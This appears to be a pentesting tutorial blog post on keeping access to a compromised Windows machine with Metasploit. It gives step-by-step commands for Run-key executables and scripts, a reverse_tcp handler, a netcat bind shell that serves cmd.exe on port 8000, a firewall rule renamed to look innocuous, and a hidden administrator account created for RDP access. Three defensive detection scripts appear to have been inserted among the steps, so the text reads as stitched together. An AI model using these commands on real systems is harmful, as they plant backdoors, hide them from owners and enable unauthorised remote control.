Persistence Techniques with Metasploit - Part 6
Persistence Techniques with Metasploit
Getting a shell in the real world requires a lot of hard work and research. Is all that work put in just so that we are fine with losing the session when the user logs off or turns the computer off ? Hell no ! We need to make our connection persistent so that we can get it back when the computer is on or when the user logs in. In this part we will be taking a look at the post module section, which helps us make our connection persistent after exploiting the target machine.
Note : To create a persistence backdoor you should have already compromised the target machine and have a meterpreter shell
PoV : you have already exploited the target machine and have a meterpreter shell
Commands :
use exploit/windows/local/persistence_exe
show options
Fig : 1.1
In Fig : 1.1 we can see the different options available
REXENAME defines the name of the exe file the module is going to put on the remote system
REXEPATH is the local path of the executable that gave us the session
SESSION expects the number of the session over which we want the persistent connection
STARTUP has a set of values which define how the exe file is executed on startup :
USER : Starts the exe file upon user login (does not require the session to have privileges)
SYSTEM : Starts the exe file on system boot (requires the session to have privileges)
SERVICE : Runs the exe file as a service (requires the session to have privileges)
Commands :
set REXEPATH /home/nikhil/payload/newcalc.exe (Path of the payload in my case)
set SESSION 1 (session number in my case)
Fig : 1.2
I am leaving STARTUP at USER in my case, as my session on the target doesn't have privileges because the payload was executed by a regular user
Before you hit run, make sure that you have the multi-handler running in the background to catch the session upon user login, using the following commands :
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.13.235 (Whatever your machine's ip is)
set LPORT 9999
set ExitOnSession false
run -j
Now that you have the multi-handler running in the background, come back to the persistence module and run it
Commands :
use post/windows/manage/persistence_exe
run
Fig : 1.3
In Fig : 1.3 we can see a lot of info printed when we run the module, and a new session has already been created as well !
I recommend you copy and store this info, which helps to clear the connect-back behaviour of the target machine to the attacker machine manually upon user login. This is a must in the real world as a white hat hacker, as the post modules sometimes don't do a good job of cleaning up :)
Now let's reboot the target windows machine and see if we get the session upon user login !
Fig : 1.4
In Fig : 1.4 we can see that we first lost our existing sessions as we rebooted the target system, and then, when I logged in, we can see the new session we've got from the target machine ! Isn't that cool !
So this way we can gain a persistent connection to the target machine
Now that we have gained the persistent connection, it's time to clear the executable which does the connection back to the attacker machine, which is usually done in the real world after the assessment
To do so we can simply run the resource file on the remote machine that was set up by the persistence module itself at the time we ran it. As I told you to copy the info the module gave, go and copy the complete path of the .rc file, which is denoted by the field Cleanup Meterpreter RC File.
Command :
resource PathOfTheResourceFile
Fig : 1.5
And now you can reboot the remote target machine, and you will notice no session coming back to you !
It is recommended to execute the resource file on the session that you gained because of the persistence module so that the resource file executes with no problems, but nothing ever goes as planned in this accursed world ! If the script file did not clean up properly, or if we are still able to catch the session even after running the resource file, then we have to remove the entries present in the registry manually. I had exactly that case, so let's do it manually !
Go to your target windows machine :
Windows icon -> search regedit -> HKEY_CURRENT_USER -> Software -> Microsoft -> Windows -> CurrentVersion -> Run (you can find this location in the info section that we copied before)
Fig : 1.6
In Fig : 1.6 you can see the entry in the autorun list (never mind the entry details in my case; if you have noticed, it is misconfigured)
So just right click it and delete it !
And that's how we stop the target machine from connecting back to us :)
Registry Persistence
The previous module installed an exe file onto the system and ran it upon user login, but the module we are going to see now puts the script that will connect back to the attacker machine into the registry key instead of the path of an executable ! Woop-Woop !
Commands :
use exploit/windows/local/registry_persistence
show options
Fig : 1.7
In Fig : 1.7 we can see the only necessary options are LHOST, LPORT and SESSION, so let's give the module what it needs and run it
Commands :
set LHOST localmachineip
set LPORT portnumber (the port the multi-handler is listening on)
set SESSION sessionnumber (which is 1 in my case)
run
Note :
The payload is set to windows/meterpreter/reverse_tcp by default, which is exactly our connect-back type; you can change it if yours is different
Fig : 1.8
In Fig : 1.8 you can see the module ran successfully, and you know the drill: the info generated is helpful, so copy and save it somewhere
And now let's restart the target machine and see if we get a connect-back upon user login, as the startup option is set to USER
Fig : 1.9
And there we go, in Fig : 1.9 we can see the session we've got
Fig : 2.0
In Fig : 2.0 we can see the script in the Run registry key; that for sure is scary as hell, and you are on your own to clear the connect-back behaviour this time.
Persistence technique using netcat
We can make our connection persistent using netcat as well ! To do so we need to upload the netcat.exe file onto the windows machine (if it doesn't exist already) and make a manual entry in the Run registry key which makes the target windows machine listen on a certain port upon user login. Then we also need to add a firewall rule so that the target windows machine's firewall doesn't block our inbound connection
So let's first upload the netcat.exe file onto the target windows machine through the meterpreter session we've got
Command :
upload PathOfExecutableOnLocalMachine PathOnRemoteMachineToStoreTheExecutable
Fig : 2.1
In Fig : 2.1 we can see that the nc.exe file has been uploaded to the target machine at the location C:\Users\Itachi\Desktop
Now that we are done with the uploading part, it's time for the real deal. This is when we create an entry in the Run registry key which makes it run upon user login, and all thanks to meterpreter, as this can be achieved through the reg command provided by meterpreter :)
Command :
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\Users\Itachi\nc.exe -Ldp 8000 -e cmd.exe'
-k : the registry key path
-v : the name of the registry value
-d : the data of the value, i.e. the command to be executed
Fig : 2.2
Fig : 2.3
In Fig : 2.3 we can see the entry created in the Run registry key
As we are done with creating the entry in the Run registry key, it's time to create a firewall rule which allows inbound connections to that specific port
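Both Run-key variants seen so far (the exe dropped by persistence_exe, the script written by registry_persistence, and the nc.exe entry above) leave a value under a Run key, and the manual regedit walk earlier in the post is how you find them by eye. The script below is an added example written for this post, not code from the post or from Metasploit: it parses the text that `reg query` prints for a Run key and flags entries that match the patterns those three techniques leave behind (a Temp or profile-root path, a script instead of a program, a command that spawns cmd.exe or opens a listening port). The sample output, value names, paths and user name are constructed; the same parser works on HKLM output, since the line format is identical.

```python
import re

# Constructed sample of what `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`
# prints. Two entries are ordinary software; two mimic the Run-key persistence discussed
# in the post (a dropped script in Temp, and a listener in the profile root).
# Value names, paths and the user name are made up for this example.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\Itachi\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Dropbox    REG_SZ    "C:\Program Files (x86)\Dropbox\Client\Dropbox.exe" /systemstartup
    WQzMnTfR    REG_SZ    C:\Users\Itachi\AppData\Local\Temp\WQzMnTfR.vbs
    netcat    REG_SZ    C:\Users\Itachi\nc.exe -Ldp 8000 -e cmd.exe
"""

# One value line of `reg query` output: four spaces, name, four spaces, type, four spaces, data.
VALUE_LINE = re.compile(r"^ {4}(\S+) {4}(REG_\w+) {4}(.*)$")

# Each heuristic is (pattern matched against the value data, reason reported when it hits).
INDICATORS = [
    (re.compile(r"\\Temp\\", re.I), "runs from a Temp directory"),
    (re.compile(r"\\(Desktop|Downloads|Public)\\", re.I), "runs from a user data folder"),
    (re.compile(r'^"?[a-z]:\\Users\\[^\\]+\\[^\\\s"]+\.exe', re.I), "binary sits directly in a profile root"),
    (re.compile(r"\.(vbs|js|bat|ps1|hta)\b", re.I), "launches a script instead of a program"),
    (re.compile(r"-e\s+\S*cmd(\.exe)?\b", re.I), "hands cmd.exe to another program (shell-spawning pattern)"),
    (re.compile(r"\s-l\w*p\s+\d+", re.I), "opens a listening port"),
]


def parse_run_key(text):
    """Turn `reg query` output into (value_name, value_type, data) tuples."""
    entries = []
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2), m.group(3).strip()))
    return entries


def audit_run_entries(entries):
    """Return one finding per entry that trips at least one indicator."""
    findings = []
    for name, _type, data in entries:
        reasons = [why for pat, why in INDICATORS if pat.search(data)]
        if reasons:
            findings.append({"name": name, "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_run_entries(parse_run_key(SAMPLE_REG_QUERY)):
        print(f"[!] {f['name']}: {f['data']}")
        for r in f["reasons"]:
            print(f"      - {r}")
```

The indicators are deliberately narrow so that ordinary per-user software (OneDrive under AppData, Dropbox under Program Files) is not reported; on a real host you would feed it the output of `reg query` for both the HKCU and HKLM Run keys and compare the findings against a known-good baseline.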
Command :
netsh advfirewall firewall add rule name=netcat dir=in action=allow protocol=Tcp localport=8000
Fig : 2.4
Fig : 2.5
In Fig : 2.5 we see the entry added to the inbound rules of the firewall. Of course, in real-world pentesting we are not going to name our rule netcat, which makes it obvious; we could name it something less suspicious like microsoft services
That's all there is to it. Restart the target machine and now try to connect to the listening port (you will see a cmd.exe window flash on the screen when the target machine reboots, which is fishy, but we know why)
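A rule named "microsoft services" hides from a casual look at the inbound list, but a rule added from the command line still differs from the built-in ones in a way that can be checked mechanically: it has no Grouping, and it opens a port that is not in the host's baseline. The script below is an added example for this post, not code from the post or from Windows; it parses the text that `netsh advfirewall firewall show rule name=all` prints and flags enabled inbound allow rules that are ungrouped or open an unexpected port. The sample output is constructed and trimmed to the fields the check reads, and the baseline of expected ports is an assumption for the example.

```python
# Constructed sample of `netsh advfirewall firewall show rule name=all` output, trimmed to
# the fields this check reads. Three rules are Windows built-ins (they carry a Grouping);
# two were added by hand with `netsh ... add rule` as in the post and have no group.
# Rule names and ports are made up for the example.
SAMPLE_NETSH = """
Rule Name:                            Remote Desktop - User Mode (TCP-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Grouping:                             Remote Desktop
Protocol:                             TCP
LocalPort:                            3389
Action:                               Allow

Rule Name:                            Core Networking - DNS (UDP-Out)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Grouping:                             Core Networking
Protocol:                             UDP
LocalPort:                            Any
Action:                               Allow

Rule Name:                            File and Printer Sharing (SMB-In)
----------------------------------------------------------------------
Enabled:                              No
Direction:                            In
Grouping:                             File and Printer Sharing
Protocol:                             TCP
LocalPort:                            445
Action:                               Allow

Rule Name:                            netcat
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Grouping:
Protocol:                             TCP
LocalPort:                            8000
Action:                               Allow

Rule Name:                            microsoft services
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Grouping:
Protocol:                             TCP
LocalPort:                            4444
Action:                               Allow
"""

# Ports this host is expected to accept. Constructed baseline for the example only.
EXPECTED_INBOUND_PORTS = {3389}


def parse_netsh_rules(text):
    """Split `netsh ... show rule` output into one dict per rule (field name -> value)."""
    rules, current = [], None
    for line in text.splitlines():
        if line.startswith("Rule Name:"):
            current = {}
            rules.append(current)
        if current is None or ":" not in line:
            continue  # dashed separators and blank lines carry no field
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    return rules


def audit_inbound_rules(rules, expected=EXPECTED_INBOUND_PORTS):
    """Flag enabled inbound allow rules that have no rule group or open a port outside the baseline."""
    findings = []
    for r in rules:
        if r.get("Enabled") != "Yes" or r.get("Direction") != "In" or r.get("Action") != "Allow":
            continue
        reasons = []
        if not r.get("Grouping"):
            reasons.append("no rule group (typical of rules added by hand with netsh)")
        port = r.get("LocalPort", "Any")
        if port.isdigit() and int(port) not in expected:
            reasons.append(f"opens {r.get('Protocol')} port {port}, which is not in the baseline")
        if reasons:
            findings.append({"name": r["Rule Name"], "port": port, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_inbound_rules(parse_netsh_rules(SAMPLE_NETSH)):
        print(f"[!] rule '{f['name']}' (port {f['port']}): " + "; ".join(f["reasons"]))
```

Disabled rules and outbound rules are skipped on purpose, so the disabled SMB rule and the DNS rule stay quiet; only the two hand-added rules are reported, whatever they were named.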
Command :
nc -nv TargetMachineIp 8000
Fig : 2.6
And there you go, in Fig : 2.6 you can see that we got the cmd.exe back successfully !
Persistence With RDP :
Yes ! You heard it right, we can get and maintain a persistent graphical user interface as well !
To do so we are going to use the module windows/manage/enable_rdp
Commands :
use windows/manage/enable_rdp
show options
Fig : 2.7
In Fig : 2.7 we can see the required options are SESSION, USERNAME and PASSWORD
set SESSION 2 (in my case)
set USERNAME hehe (could be anything of your wish)
set PASSWORD P@ssw0rd! (could be anything of your wish)
run
Fig : 2.8
And there you go, we have created a user on the target machine named hehe with the password set to P@ssw0rd! . Not only that, the module also enables RDP on the target machine if it is disabled and adds the created user hehe to the local groups Remote Desktop Users and Administrators, which means we can get the GUI with admin rights !
Fig : 2.9
In Fig : 2.9 just type yes and hit enter
In Fig : 3.0 you can see the gui to interact with , click on Other User and enter the details to login
Fig : 3.1
and should be pretty cautious . It is recommended to use it during off-hours, when no employee is sitting in front of the machine .
Fig : 3.2
Note :
If you know the username and password of any account on the target machine then there is no need to create a new user on the target; you could just enable RDP on the target machine and you are good to go !
And there you go, we have covered a bunch of techniques for gaining a persistent connection over the target machine. I hope you have learned something new today :)
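What enable_rdp does on the target, as described above (create a user, then put it into Remote Desktop Users and Administrators), is exactly the sequence a defender can correlate in the Security log: a 4720 "user account created" event followed seconds later by 4732 "member added to local group" events for the same account. The script below is an added example for this post, not code from the post or from Metasploit. It works on constructed, simplified records rather than raw event-log XML (in a real 4732 event the member is a SID that you would resolve to a name first), and the 10-minute window and the 07:00-19:00 business-hours range are assumptions chosen for the example.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not raw EVTX): only the fields this check
# reads. 4720 = a user account was created, 4732 = a member was added to a local group.
# In a real 4732 event the member arrives as a SID; here it is already resolved to a name.
# Times, account names and the operator account are made up for the example.
SAMPLE_EVENTS = [
    {"id": 4720, "time": "2021-03-01T22:14:05", "subject": "Itachi", "target": "hehe"},
    {"id": 4732, "time": "2021-03-01T22:14:06", "subject": "Itachi", "group": "Remote Desktop Users", "member": "hehe"},
    {"id": 4732, "time": "2021-03-01T22:14:06", "subject": "Itachi", "group": "Administrators", "member": "hehe"},
    {"id": 4720, "time": "2021-03-01T09:00:00", "subject": "helpdesk", "target": "jsmith"},
    {"id": 4732, "time": "2021-03-02T09:30:00", "subject": "helpdesk", "group": "Remote Desktop Users", "member": "jsmith"},
]

# Groups whose membership grants interactive RDP access (Administrators gets it implicitly).
RDP_RELEVANT_GROUPS = {"Remote Desktop Users", "Administrators"}

# Assumed business hours for the after-hours flag; adjust to the environment.
BUSINESS_HOURS = range(7, 19)


def _ts(s):
    return datetime.fromisoformat(s)


def correlate_rdp_account_creation(events, window=timedelta(minutes=10)):
    """Pair each 4720 with 4732 events that add the same new account to an RDP-relevant
    group within `window`. Returns one finding per account that matches."""
    additions = [e for e in events if e["id"] == 4732 and e["group"] in RDP_RELEVANT_GROUPS]
    findings = []
    for created in (e for e in events if e["id"] == 4720):
        t0 = _ts(created["time"])
        groups = sorted({a["group"] for a in additions
                         if a["member"] == created["target"]
                         and timedelta(0) <= _ts(a["time"]) - t0 <= window})
        if groups:
            findings.append({
                "user": created["target"],
                "created_by": created["subject"],
                "when": created["time"],
                "groups": groups,
                "after_hours": t0.hour not in BUSINESS_HOURS,
            })
    return findings


if __name__ == "__main__":
    for f in correlate_rdp_account_creation(SAMPLE_EVENTS):
        flag = " (after hours)" if f["after_hours"] else ""
        print(f"[!] {f['when']}{flag}: {f['created_by']} created '{f['user']}' and added it to {f['groups']}")
```

The helpdesk account in the sample is created one morning and added to Remote Desktop Users the next day, so it falls outside the default window and is not reported; widen the window and it is, which is the knob to tune against your own change-management data.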
--------------------------------------------------------------NOT THE END-----------------------------------------------------